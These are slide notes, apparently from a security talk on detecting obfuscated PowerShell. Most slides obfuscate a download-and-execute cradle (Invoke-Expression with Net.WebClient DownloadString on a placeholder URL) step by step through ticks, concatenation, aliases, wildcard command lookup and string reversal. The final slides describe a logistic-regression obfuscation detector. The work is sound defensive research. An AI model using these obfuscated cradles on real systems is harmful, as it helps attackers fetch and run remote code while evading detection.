• What script block elements can we key off of for this?
• Invoke-Expression
• New-Object
• Net.WebClient
• Download
55. Obfuscating the Cradle
• Invoke-Expression (New-Object Net.WebClient)."`D`o`w`N`l`o`A`d`S`T`R`i`N`g"(
'ht'+'tps://bit.ly/L3g1t')
• What script block elements can we key off of for this?
• Invoke-Expression
• New-Object
• Net.WebClient
• Download (Options: RegEx all the things or scratch this indicator)
56. Obfuscating the Cradle
• Invoke-Expression (New-Object Net.WebClient)."`D`o`w`N`l`o`A`d`S`T`R`i`N`g"(
'ht'+'tps://bit.ly/L3g1t')
• What script block elements can we key off of for this?
• Invoke-Expression
• New-Object
• Net.WebClient
• Download (Options: RegEx all the things or scratch this indicator)
WebClient class has options:
• .DownloadString…
• .DownloadFile…
• .DownloadData…
• .OpenRead
• .OpenReadAsync
• .OpenReadTaskAsync
57. Obfuscating the Cradle
• Invoke-Expression (New-Object Net.WebClient)."`D`o`w`N`l`o`A`d`S`T`R`i`N`g"(
'ht'+'tps://bit.ly/L3g1t')
• What script block elements can we key off of for this?
• Invoke-Expression
• New-Object
• Net.WebClient
• Download (Options: RegEx all the things or scratch this indicator)
DownloadString CAN be treated as a string or variable with .Invoke! (req’d in PS2.0)
Invoke-Expression (New-Object Net.WebClient).("Down"+"loadString").Invoke(
'ht'+'tps://bit.ly/L3g1t')
$ds = "Down"+"loadString"; Invoke-Expression (New-Object Net.WebClient).
$ds.Invoke( 'ht'+'tps://bit.ly/L3g1t')
58. Obfuscating the Cradle
• Invoke-Expression (New-Object Net.WebClient)."`D`o`w`N`l`o`A`d`S`T`R`i`N`g"(
'ht'+'tps://bit.ly/L3g1t')
• What script block elements can we key off of for this?
• Invoke-Expression
• New-Object
• Net.WebClient
59. Obfuscating the Cradle
• Invoke-Expression (New-Object Net.WebClient)."`D`o`w`N`l`o`A`d`S`T`R`i`N`g"(
'ht'+'tps://bit.ly/L3g1t')
• What script block elements can we key off of for this?
• Invoke-Expression
• New-Object
• Net.WebClient
60. Obfuscating the Cradle
• Invoke-Expression (New-Object Net.WebClient)."`D`o`w`N`l`o`A`d`S`T`R`i`N`g"(
'ht'+'tps://bit.ly/L3g1t')
• What script block elements can we key off of for this?
• Invoke-Expression
• New-Object
• Net.WebClient
We have options…
1. (New-Object "`N`e`T`.`W`e`B`C`l`i`e`N`T")
2. (New-Object ("Net"+".Web"+"Client"))
3. $var1="Net."; $var2="WebClient"; (New-Object $var1$var2)
61. Obfuscating the Cradle
• Invoke-Expression (New-Object "`N`e`T`.`W`e`B`C`l`i`e`N`T")."`D`o`w`N`l`o`A`d`S`T`R`i`N`g"(
'ht'+'tps://bit.ly/L3g1t')
• What script block elements can we key off of for this?
• Invoke-Expression
• New-Object
• Net.WebClient
We have options…
1. (New-Object "`N`e`T`.`W`e`B`C`l`i`e`N`T")
2. (New-Object ("Net"+".Web"+"Client"))
3. $var1="Net."; $var2="WebClient"; (New-Object $var1$var2)
62. Obfuscating the Cradle
• Invoke-Expression (New-Object "`N`e`T`.`W`e`B`C`l`i`e`N`T")."`D`o`w`N`l`o`A`d`S`T`R`i`N`g"(
'ht'+'tps://bit.ly/L3g1t')
• What script block elements can we key off of for this?
• Invoke-Expression
• New-Object
63. Obfuscating the Cradle
• Invoke-Expression (New-Object "`N`e`T`.`W`e`B`C`l`i`e`N`T")."`D`o`w`N`l`o`A`d`S`T`R`i`N`g"(
'ht'+'tps://bit.ly/L3g1t')
• What script block elements can we key off of for this?
• Invoke-Expression
• New-Object
• There aren't any aliases for New-Object cmdlet, so shouldn't this be safe to trigger on?
If only PowerShell wasn't so helpful…
64. Obfuscating the Cradle
• Invoke-Expression (New-Object "`N`e`T`.`W`e`B`C`l`i`e`N`T")."`D`o`w`N`l`o`A`d`S`T`R`i`N`g"(
'ht'+'tps://bit.ly/L3g1t')
• What script block elements can we key off of for this?
• Invoke-Expression
• New-Object
• Get-Command →
shows all available
functions, cmdlets,
etc.
65. Obfuscating the Cradle
• Invoke-Expression (New-Object "`N`e`T`.`W`e`B`C`l`i`e`N`T")."`D`o`w`N`l`o`A`d`S`T`R`i`N`g"(
'ht'+'tps://bit.ly/L3g1t')
• What script block elements can we key off of for this?
• Invoke-Expression
• New-Object
• Get-Command → Return a single cmdlet name? Why not invoke it!
• Invoke-Expression (Get-Command New-Object)
But we can be more creative…
66. Obfuscating the Cradle
• Invoke-Expression (New-Object "`N`e`T`.`W`e`B`C`l`i`e`N`T")."`D`o`w`N`l`o`A`d`S`T`R`i`N`g"(
'ht'+'tps://bit.ly/L3g1t')
• What script block elements can we key off of for this?
• Invoke-Expression
• New-Object
• Get-Command → Return a single cmdlet name? Why not invoke it!
• & (Get-Command New-Object)
• . (Get-Command New-Object)
There we go… invocation ops
67. Obfuscating the Cradle
• Invoke-Expression (New-Object "`N`e`T`.`W`e`B`C`l`i`e`N`T")."`D`o`w`N`l`o`A`d`S`T`R`i`N`g"(
'ht'+'tps://bit.ly/L3g1t')
• What script block elements can we key off of for this?
• Invoke-Expression
• New-Object
• Get-Command → Wildcards are our friend…
• & (Get-Command New-Object)
• . (Get-Command New-Object)
68. Obfuscating the Cradle
• Invoke-Expression (New-Object "`N`e`T`.`W`e`B`C`l`i`e`N`T")."`D`o`w`N`l`o`A`d`S`T`R`i`N`g"(
'ht'+'tps://bit.ly/L3g1t')
• What script block elements can we key off of for this?
• Invoke-Expression
• New-Object
• Get-Command → Wildcards are our friend…
• & (Get-Command New-Objec*)
• . (Get-Command New-Objec*)
69. Obfuscating the Cradle
• Invoke-Expression (New-Object "`N`e`T`.`W`e`B`C`l`i`e`N`T")."`D`o`w`N`l`o`A`d`S`T`R`i`N`g"(
'ht'+'tps://bit.ly/L3g1t')
• What script block elements can we key off of for this?
• Invoke-Expression
• New-Object
• Get-Command → Wildcards are our friend…
• & (Get-Command New-Obje*)
• . (Get-Command New-Obje*)
70. Obfuscating the Cradle
• Invoke-Expression (New-Object "`N`e`T`.`W`e`B`C`l`i`e`N`T")."`D`o`w`N`l`o`A`d`S`T`R`i`N`g"(
'ht'+'tps://bit.ly/L3g1t')
• What script block elements can we key off of for this?
• Invoke-Expression
• New-Object
• Get-Command → Wildcards are our friend…
• & (Get-Command New-Obj*)
• . (Get-Command New-Obj*)
71. Obfuscating the Cradle
• Invoke-Expression (New-Object "`N`e`T`.`W`e`B`C`l`i`e`N`T")."`D`o`w`N`l`o`A`d`S`T`R`i`N`g"(
'ht'+'tps://bit.ly/L3g1t')
• What script block elements can we key off of for this?
• Invoke-Expression
• New-Object
• Get-Command → Wildcards are our friend…
• & (Get-Command New-Ob*)
• . (Get-Command New-Ob*)
72. Obfuscating the Cradle
• Invoke-Expression (New-Object "`N`e`T`.`W`e`B`C`l`i`e`N`T")."`D`o`w`N`l`o`A`d`S`T`R`i`N`g"(
'ht'+'tps://bit.ly/L3g1t')
• What script block elements can we key off of for this?
• Invoke-Expression
• New-Object
• Get-Command → Wildcards are our friend…
• & (Get-Command New-O*)
• . (Get-Command New-O*)
73. Obfuscating the Cradle
• Invoke-Expression (New-Object "`N`e`T`.`W`e`B`C`l`i`e`N`T")."`D`o`w`N`l`o`A`d`S`T`R`i`N`g"(
'ht'+'tps://bit.ly/L3g1t')
• What script block elements can we key off of for this?
• Invoke-Expression
• New-Object
• Get-Command → Wildcards are our friend…
• & (Get-Command *ew-O*)
• . (Get-Command *ew-O*)
74. Obfuscating the Cradle
• Invoke-Expression (New-Object "`N`e`T`.`W`e`B`C`l`i`e`N`T")."`D`o`w`N`l`o`A`d`S`T`R`i`N`g"(
'ht'+'tps://bit.ly/L3g1t')
• What script block elements can we key off of for this?
• Invoke-Expression
• New-Object
• Get-Command → Wildcards are our friend…
• & (Get-Command *w-O*)
• . (Get-Command *w-O*)
75. Obfuscating the Cradle
• Invoke-Expression (New-Object "`N`e`T`.`W`e`B`C`l`i`e`N`T")."`D`o`w`N`l`o`A`d`S`T`R`i`N`g"(
'ht'+'tps://bit.ly/L3g1t')
• What script block elements can we key off of for this?
• Invoke-Expression
• New-Object
• Get-Command → Did I mention Get-Command also has aliases?
• & (Get-Command *w-O*)
• . (Get-Command *w-O*)
• & (GCM *w-O*).
• . (GCM *w-O*)
76. Obfuscating the Cradle
• Invoke-Expression (New-Object "`N`e`T`.`W`e`B`C`l`i`e`N`T")."`D`o`w`N`l`o`A`d`S`T`R`i`N`g"(
'ht'+'tps://bit.ly/L3g1t')
• What script block elements can we key off of for this?
• Invoke-Expression
• New-Object
• Get-Command → Did I mention Get-Command also has MORE aliases?
• & (Get-Command *w-O*)
• . (Get-Command *w-O*)
• & (GCM *w-O*).
• . (GCM *w-O*)
• & (COMMAND *w-O*).
• . (COMMAND *w-O*)
COMMAND works because PowerShell
auto prepends "Get-" to any
command, so COMMAND resolves to
Get-Command.
77. Obfuscating the Cradle
• Invoke-Expression (New-Object "`N`e`T`.`W`e`B`C`l`i`e`N`T")."`D`o`w`N`l`o`A`d`S`T`R`i`N`g"(
'ht'+'tps://bit.ly/L3g1t')
• What script block elements can we key off of for this?
• Invoke-Expression
• New-Object | Get-Command | GCM | Command
• Get-Command → Can also be set with a string variable
• & (Get-Command *w-O*)
• . (Get-Command *w-O*)
• $var1="New"; $var2="-Object"; $var3=$var1+$var2; & (GCM $var3)
• & (GCM *w-O*).
• . (GCM *w-O*)
• & (COMMAND *w-O*).
• . (COMMAND *w-O*)
78. Obfuscating the Cradle
• Invoke-Expression ((New-Object "`N`e`T`.`W`e`B`C`l`i`e`N`T"). "`D`o`w`N`l`o`A`d`S`T`R`i`N`g"(
'ht'+'tps://bit.ly/L3g1t'))
• What script block elements can we key off of for this?
• Invoke-Expression
• New-Object | Get-Command | GCM | Command
• Get-Command → Can also be set with a string variable
• & (Get-Command *w-O*)
• . (Get-Command *w-O*)
• $var1="New"; $var2="-Object"; $var3=$var1+$var2; & (GCM $var3)
• & (GCM *w-O*).
• . (GCM *w-O*)
• & (COMMAND *w-O*).
• . (COMMAND *w-O*)
PowerShell 1.0 ways of calling Get-Command:
1. $ExecutionContext.InvokeCommand.GetCommand("New-Ob"+"ject", [System.Management.Automation.CommandTypes]::Cmdlet)
2. $ExecutionContext.InvokeCommand.GetCmdlet("New-Ob"+"ject")
3. $ExecutionContext.InvokeCommand.GetCommands("*w-o*",[System.Management.Automation.CommandTypes]::Cmdlet,1)
4. $ExecutionContext.InvokeCommand.GetCmdlets("*w-o*")
5. $ExecutionContext.InvokeCommand.GetCommand($ExecutionContext.InvokeCommand.GetCommandName("*w-o*",1,1),
[System.Management.Automation.CommandTypes]::Cmdlet)
6. $ExecutionContext.InvokeCommand.GetCmdlet($ExecutionContext.InvokeCommand.GetCommandName("*w-o*",1,1))
79. Obfuscating the Cradle
• Invoke-Expression (New-Object "`N`e`T`.`W`e`B`C`l`i`e`N`T")."`D`o`w`N`l`o`A`d`S`T`R`i`N`g"(
'ht'+'tps://bit.ly/L3g1t')
• What script block elements can we key off of for this?
• Invoke-Expression
• New-Object | Get-Command | GCM | Command
• Get-Command → Can also be set with a string variable
• & (Get-Command *w-O*)
• . (Get-Command *w-O*)
• $var1="New"; $var2="-Object"; $var3=$var1+$var2; & (GCM $var3)
• & (GCM *w-O*).
• . (GCM *w-O*)
• & (COMMAND *w-O*).
• . (COMMAND *w-O*)
NOTE: Get-Command's
cousin is just as useful…
Get-Alias / GAL / Alias
80. Obfuscating the Cradle
• Invoke-Expression (& (GCM *w-O*) "`N`e`T`.`W`e`B`C`l`i`e`N`T")."`D`o`w`N`l`o`A`d`S`T`R`i`N`g"(
'ht'+'tps://bit.ly/L3g1t')
• What script block elements can we key off of for this?
• Invoke-Expression
• New-Object | Get-Command | GCM | Command | Get-Alias | GAL | Alias
• Get-Command → Can also be set with a string variable
• & (Get-Command *w-O*)
• . (Get-Command *w-O*)
• $var1="New"; $var2="-Object"; $var3=$var1+$var2; & (GCM $var3)
• & (GCM *w-O*).
• . (GCM *w-O*)
• & (COMMAND *w-O*).
• . (COMMAND *w-O*)
81. Obfuscating the Cradle
• Invoke-Expression (& (GCM *w-O*) "`N`e`T`.`W`e`B`C`l`i`e`N`T")."`D`o`w`N`l`o`A`d`S`T`R`i`N`g"(
'ht'+'tps://bit.ly/L3g1t')
• What script block elements can we key off of for this?
• Invoke-Expression
• New-Object | Get-Command | GCM | Command | Get-Alias | GAL | Alias
• Given wildcards it's infeasible to find all possible ways for Get-
Command/GCM/Command/Get-Alias/GAL/Alias to find and execute New-Object, so potential
for FPs with this approach.
82. Obfuscating the Cradle
• Invoke-Expression (& (`G`C`M *w-O*) "`N`e`T`.`W`e`B`C`l`i`e`N`T")."`D`o`w`N`l`o`A`d`S`T`R`i`N`g"(
'ht'+'tps://bit.ly/L3g1t')
• What script block elements can we key off of for this?
• Invoke-Expression
• `N`e`w`-`O`b`j`e`c`T | `G`e`T`-`C`o`m`m`a`N`d | `G`C`M | `C`O`M`M`A`N`D | G`e`T`-`A`l`i`A`s |
`G`A`L | `A`l`i`A`s
• Ticks also work on PowerShell cmdlets…
83. Obfuscating the Cradle
• Invoke-Expression (& (`G`C`M *w-O*) "`N`e`T`.`W`e`B`C`l`i`e`N`T")."`D`o`w`N`l`o`A`d`S`T`R`i`N`g"(
'ht'+'tps://bit.ly/L3g1t')
• What script block elements can we key off of for this?
• Invoke-Expression
• `N`e`w`-`O`b`j`e`c`T | `G`e`T`-`C`o`m`m`a`N`d | `G`C`M | `C`O`M`M`A`N`D | G`e`T`-`A`l`i`A`s |
`G`A`L | `A`l`i`A`s
• Ticks also work on PowerShell cmdlets…and so do invocation operators.
• & ('Ne'+'w-Obj'+'ect') & ("{1}{0}{2}" -f 'w-Ob','Ne','ject')
• . ('Ne'+'w-Obj'+'ect') . ("{1}{0}{2}" -f 'w-Ob','Ne','ject')
Concatenated Reordered
84. Obfuscating the Cradle
• Invoke-Expression (& (`G`C`M *w-O*) "`N`e`T`.`W`e`B`C`l`i`e`N`T")."`D`o`w`N`l`o`A`d`S`T`R`i`N`g"(
'ht'+'tps://bit.ly/L3g1t')
• What script block elements can we key off of for this?
• Invoke-Expression
• `N`e`w`-`O`b`j`e`c`T | `G`e`T`-`C`o`m`m`a`N`d | `G`C`M | `C`O`M`M`A`N`D | G`e`T`-`A`l`i`A`s |
`G`A`L | `A`l`i`A`s
• Ticks also work on PowerShell cmdlets…and so do invocation operators.
• Once again, Regex all the things or give up on this indicator
85. Obfuscating the Cradle
• Invoke-Expression (& (`G`C`M *w-O*) "`N`e`T`.`W`e`B`C`l`i`e`N`T")."`D`o`w`N`l`o`A`d`S`T`R`i`N`g"(
'ht'+'tps://bit.ly/L3g1t')
• What script block elements can we key off of for this?
• Invoke-Expression
86. Obfuscating the Cradle
• Invoke-Expression (& (`G`C`M *w-O*) "`N`e`T`.`W`e`B`C`l`i`e`N`T")."`D`o`w`N`l`o`A`d`S`T`R`i`N`g"(
'ht'+'tps://bit.ly/L3g1t')
• What script block elements can we key off of for this?
• Invoke-Expression
• What's potentially problematic about Invoke-Expression?
87. Obfuscating the Cradle
• Invoke-Expression (& (`G`C`M *w-O*) "`N`e`T`.`W`e`B`C`l`i`e`N`T")."`D`o`w`N`l`o`A`d`S`T`R`i`N`g"(
'ht'+'tps://bit.ly/L3g1t')
• What script block elements can we key off of for this?
• Invoke-Expression
• What's potentially problematic about Invoke-Expression?
1. Aliases: Invoke-Expression / IEX
1. Invoke-Expression "Write-Host IEX Example -ForegroundColor Green"
2. IEX "Write-Host IEX Example -ForegroundColor Green"
88. Obfuscating the Cradle
• Invoke-Expression (& (`G`C`M *w-O*) "`N`e`T`.`W`e`B`C`l`i`e`N`T")."`D`o`w`N`l`o`A`d`S`T`R`i`N`g"(
'ht'+'tps://bit.ly/L3g1t')
• What script block elements can we key off of for this?
• Invoke-Expression
• What's potentially problematic about Invoke-Expression?
1. Aliases: Invoke-Expression / IEX
2. Order
1. IEX "Write-Host IEX Example -ForegroundColor Green"
2. "Write-Host IEX Example -ForegroundColor Green" | IEX
89. Obfuscating the Cradle
.
• Invoke-Expression (& (`G`C`M *w-O*) "`N`e`T`.`W`e`B`C`l`i`e`N`T")."`D`o`w`N`l`o`A`d`S`T`R`i`N`g"(
'ht'+'tps://bit.ly/L3g1t')
• What script block elements can we key off of for this?
• Invoke-Expression
• What's potentially problematic about Invoke-Expression?
1. Aliases: Invoke-Expression / IEX
2. Order
3. Ticks
1. `I`E`X
2. `I`N`v`o`k`e`-`E`x`p`R`e`s`s`i`o`N
90. Obfuscating the Cradle
.
• Invoke-Expression (& (`G`C`M *w-O*) "`N`e`T`.`W`e`B`C`l`i`e`N`T")."`D`o`w`N`l`o`A`d`S`T`R`i`N`g"(
'ht'+'tps://bit.ly/L3g1t')
• What script block elements can we key off of for this?
• Invoke-Expression
• What's potentially problematic about Invoke-Expression?
1. Aliases: Invoke-Expression / IEX
2. Order
3. Ticks
4. Invocation operators
1. & ('I'+'EX')
2. . ('{1}{0}' -f 'EX','I')
91. Obfuscating the Cradle
.
• Invoke-Expression (& (`G`C`M *w-O*) "`N`e`T`.`W`e`B`C`l`i`e`N`T")."`D`o`w`N`l`o`A`d`S`T`R`i`N`g"(
'ht'+'tps://bit.ly/L3g1t')
• What script block elements can we key off of for this?
• Invoke-Expression
• What's potentially problematic about Invoke-Expression?
1. Aliases: Invoke-Expression / IEX
2. Order
3. Ticks
4. Invocation operators
1. & ('I'+'EX')
2. . ('{1}{0}' -f 'EX','I')
92. Obfuscating the Cradle
.
• Invoke-Expression (& (`G`C`M *w-O*) "`N`e`T`.`W`e`B`C`l`i`e`N`T")."`D`o`w`N`l`o`A`d`S`T`R`i`N`g"(
'ht'+'tps://bit.ly/L3g1t')
• What script block elements can we key off of for this?
• Invoke-Expression
• What's potentially problematic about Invoke-Expression?
1. Aliases: Invoke-Expression / IEX
2. Order
3. Ticks
4. Invocation operators
5. Invoke-Expression vs Invoke-Command
93. • What's potentially problematic about "Invoke-Expression"???
1. Aliases: Invoke-Expression / IEX
2. Order
3. Ticks
4. Invocation operators
5. Invoke-Expression vs Invoke-Command
Cmdlet/Alias Example
Invoke-Command Invoke-Command {Write-Host ICM Example -ForegroundColor Green}
ICM ICM {Write-Host ICM Example -ForegroundColor Green}
.Invoke() {Write-Host ICM Example -ForegroundColor Green}.Invoke()
& & {Write-Host ICM Example -ForegroundColor Green}
. . {Write-Host ICM Example -ForegroundColor Green}
Obfuscating the Cradle
.InvokeReturnAsIs()
.InvokeWithContext() PS3.0+
94. Obfuscating the Cradle
• Invoke-Expression (& (`G`C`M *w-O*) "`N`e`T`.`W`e`B`C`l`i`e`N`T")."`D`o`w`N`l`o`A`d`S`T`R`i`N`g"(
'ht'+'tps://bit.ly/L3g1t')
• What script block elements can we key off of for this?
• Invoke-Expression || IEX || Invoke-Command || ICM || .Invoke() || … "&" or "." ?!?!?
• So we add the Invoke-Command family to our arguments…
• Don’t forget about PS 1.0!
• $ExecutionContext.InvokeCommand.InvokeScript({Write-Host SCRIPTBLOCK})
• $ExecutionContext.InvokeCommand.InvokeScript("Write-Host EXPRESSION")
95. Obfuscating the Cradle
• `I`N`V`o`k`e`-`E`x`p`R`e`s`s`i`o`N (& (`G`C`M *w-O*)
"`N`e`T`.`W`e`B`C`l`i`e`N`T")."`D`o`w`N`l`o`A`d`S`T`R`i`N`g"( 'ht'+'tps://bit.ly/L3g1t')
• What script block elements can we key off of for this?
• `I`N`V`o`k`e`-`E`x`p`R`e`s`s`i`o`N || `I`E`X || `I`N`V`o`k`e`-`C`o`m`m`A`N`d || `I`C`M ||
. "`I`N`V`o`k`e"( ) || … "&" or "." ?!?!?
• So we add the Invoke-Command family to our arguments…
• And add in ticks…
96. Obfuscating the Cradle
• `I`N`V`o`k`e`-`E`x`p`R`e`s`s`i`o`N (& (`G`C`M *w-O*)
"`N`e`T`.`W`e`B`C`l`i`e`N`T")."`D`o`w`N`l`o`A`d`S`T`R`i`N`g"( 'ht'+'tps://bit.ly/L3g1t')
• What script block elements can we key off of for this?
• `I`N`V`o`k`e`-`E`x`p`R`e`s`s`i`o`N || `I`E`X || `I`N`V`o`k`e`-`C`o`m`m`A`N`d || `I`C`M ||
. "`I`N`V`o`k`e"( ) || … "&" or "." ?!?!?
• Can we reduce FPs by only triggering on "&" or "." when "{" and "}" are present?
97. Obfuscating the Cradle
• `I`N`V`o`k`e`-`E`x`p`R`e`s`s`i`o`N (& (`G`C`M *w-O*)
"`N`e`T`.`W`e`B`C`l`i`e`N`T")."`D`o`w`N`l`o`A`d`S`T`R`i`N`g"( 'ht'+'tps://bit.ly/L3g1t')
• What script block elements can we key off of for this?
• `I`N`V`o`k`e`-`E`x`p`R`e`s`s`i`o`N || `I`E`X || `I`N`V`o`k`e`-`C`o`m`m`A`N`d || `I`C`M ||
. "`I`N`V`o`k`e"( ) || … "&" or "." ?!?!?
• Can we reduce FPs by only triggering on "&" or "." when "{" and "}" are present?
• Of course not, because we can convert strings to script blocks!
98. Obfuscating the Cradle
• `I`N`V`o`k`e`-`E`x`p`R`e`s`s`i`o`N (& (`G`C`M *w-O*)
"`N`e`T`.`W`e`B`C`l`i`e`N`T")."`D`o`w`N`l`o`A`d`S`T`R`i`N`g"( 'ht'+'tps://bit.ly/L3g1t')
• What process command line args can we key off of for this?
• `I`N`V`o`k`e`-`E`x`p`R`e`s`s`i`o`N || `I`E`X || `I`N`V`o`k`e`-`C`o`m`m`A`N`d || `I`C`M ||
. "`I`N`V`o`k`e"( ) || … "&" or "." ?!?!?
• Can we reduce FPs by only triggering on "&" or "." when "{" and "}" are present?
• Of course not, because we can convert strings to script blocks!
.Net and PS 1.0 Syntax for Script Block Conversion
1. [Scriptblock]::Create("Write-Host Script Block Conversion")
2. $ExecutionContext.InvokeCommand.NewScriptBlock("Write-Host Script Block
Conversion")
99. Obfuscating the Cradle
• `I`N`V`o`k`e`-`E`x`p`R`e`s`s`i`o`N (& (`G`C`M *w-O*)
"`N`e`T`.`W`e`B`C`l`i`e`N`T")."`D`o`w`N`l`o`A`d`S`T`R`i`N`g"( 'ht'+'tps://bit.ly/L3g1t')
• What process command line args can we key off of for this?
• `I`N`V`o`k`e`-`E`x`p`R`e`s`s`i`o`N || `I`E`X || `I`N`V`o`k`e`-`C`o`m`m`A`N`d || `I`C`M ||
. "`I`N`V`o`k`e"( ) || … "&" or "." ?!?!?
• Can we reduce FPs by only triggering on "&" or "." when "{" and "}" are present?
• Of course not, because we can convert strings to script blocks!
.Net and PS 1.0 Syntax for Script Block Conversion…and we can obfuscate those too!
1. ([Type]("Scr"+"ipt"+"block"))::("`C`R`e"+"`A`T`e").Invoke("ex"+"pres"+"sion")
2. $a = ${`E`x`e`c`u`T`i`o`N`C`o`N`T`e`x`T}; $b = $a."`I`N`V`o`k`e`C`o`m`m`A`N`d";
$b."`N`e`w`S`c`R`i`p`T`B`l`o`c`k"("ex"+"pres"+"sion")
100. Obfuscating the Cradle
• `I`N`V`o`k`e`-`E`x`p`R`e`s`s`i`o`N (& (`G`C`M *w-O*)
"`N`e`T`.`W`e`B`C`l`i`e`N`T")."`D`o`w`N`l`o`A`d`S`T`R`i`N`g"( 'ht'+'tps://bit.ly/L3g1t')
.Net and PS 1.0 Syntax for Script Block Conversion…and we can obfuscate those too!
And Invoke-CradleCrafter has even more invocation options (and obfuscation techniques)!
101.
102. More Obfuscation Techniques
• Additional command line obfuscation techniques via string manipulation
• Reverse string: $reverseCmd = ")'t1g3L/yl.tib//:sptth'(gnirtSdaolnwoD.)tneilCbeW.teN tcejbO-weN(";
1. Traverse the string in reverse and join it back together
IEX ($reverseCmd[-1..-($reverseCmd.Length)] -Join '') | IEX
2. Cast string to char array and use .Net function to reverse and then join it back together
$reverseCmdCharArray = $reverseCmd.ToCharArray(); [Array]::Reverse($reverseCmdCharArray);
IEX ($reverseCmdCharArray -Join '') | IEX
3. .Net Regex the string RightToLeft and then join it back together
IEX (-Join[RegEx]::Matches($reverseCmd,'.','RightToLeft')) | IEX
103. More Obfuscation Techniques
• Additional command line obfuscation techniques via string manipulation
• Reverse string:
• Split string: $cmdWithDelim = "(New-Object Net.We~~bClient).Downlo~~adString('https://bi~~t.ly/L3g1t')";
1. Split the string on the delimiter and join it back together
IEX ($cmdWithDelim.Split("~~") -Join '') | IEX
121. > We need more data!
So we ran a little contest...
122. > We need more data!
Underhanded PowerShell
GitHub
GitHub Gists
PoshCode
PowerShell Gallery
TechNet
Invoke-Obfuscation
Invoke-CradleCrafter
ISE Steroids Obfuscation
and created a huge PowerShell corpus ...
123. > We need more data!
Underhanded PowerShell
GitHub
GitHub Gists
PoshCode
PowerShell Gallery
TechNet
Invoke-Obfuscation
Invoke-CradleCrafter
ISE Steroids Obfuscation
Politely of course ...
138. > Identifying Obfuscation
0.0/00
Using context to detect obfuscation techniques
- Distribution of AST types
- Distribution of language operators
- Assignment, binary, invocation, …
- Array sizes
- Statistics within each AST type
- Character frequency, entropy, length (max, min, median,
mode, range), whitespace density, character casing, …
- Statistics of command names, .NET methods, variables…
Title . @Speaker . Location
This gives us 4998 features to thumbprint a script
140. > Calculating Obfuscation
0.0/00
What do we do with all these features?
- Result = Bias + (F1 * Weight1) + (F2 * Weight2) + (…)
- If(Result > Limit) { Obfuscated = True }
Title . @Speaker . Location
141. Logistic Regression
+ =
Linear Regression + Logit Function, Sitting in a Tree… M.A.T.H.I.N.G
https://en.wikipedia.org/wiki/Logistic_regression
142. > Calculating Obfuscation
0.0/00
What do we do with all these features?
- Result = Bias + (F1 * Weight1) + (F2 * Weight2) + (…)
- If(Result > Limit) { Obfuscated = True }
Title . @Speaker . Location
How do we decide 4998 importance values?
143. Calculating Weights
If at first you don’t succeed…
- Result = Bias + (F1 * Weight1) + (F2 * Weight2) + (…)
- ExpectedResult = (From labeled data)
- Error = Result – ExpectedResult
- Adjust each weight according to how much they contributed
to the error. Do this a lot.
https://en.wikipedia.org/wiki/Stochastic_gradient_descent